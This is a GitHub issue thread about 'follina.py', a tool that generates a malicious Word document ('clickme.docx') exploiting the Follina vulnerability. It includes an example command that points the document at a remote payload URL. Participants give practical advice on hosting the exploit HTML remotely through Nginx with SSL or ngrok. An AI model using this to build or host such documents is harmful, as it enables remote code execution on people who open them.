aidenmitchell
commented
2 years ago Example command:
python3 follina.py -u https://follina.pages.dev/payload
Generated 'clickme.docx' in current directory
Serving payload on http://localhost/exploit.htmlClosed aidenmitchell closed 2 years ago
aidenmitchell
commented
2 years ago Example command:
python3 follina.py -u https://follina.pages.dev/payload
Generated 'clickme.docx' in current directory
Serving payload on http://localhost/exploit.html
chvancooten
commented
2 years ago Hey! That was a quick report :)
The -u option is fairly simple currently in that it only accepts a hostname or IP address. E.g., specifying -u follina.pages.dev would have the maldoc retrieve the payload at http://follina.pages.dev:80/exploit.html. This behavior is fairly simple, but I didn't go through the effort of making everything dynamic or supporting HTTPS yet, for that matter 🙃 PRs are of course very welcome
aidenmitchell
commented
2 years ago Fair enough, sounds good. I'll see if I can get working on a PR. Thanks for the quick reply! If it's ok with you, I'll keep this issue open, and close it with the PR (link them together sort of deal.)
chvancooten
commented
2 years ago Works for me! An alternative (if you don't want to get into the dev work) would be to simply take the generated www/exploit.html file and host it using something like Nginx with Certbot for SSL.
Karewen
commented
2 years ago Will it work if I host the www/exploit.html using ngrok?
Hi there, I'm hoping to use this script to generate a Word document that gets the payload from a remote URL.
As mentioned in the docs, you can use
-uto specify a URL, but it doesn't seem to do anything, the generated document still tries to reach out tolocalhost.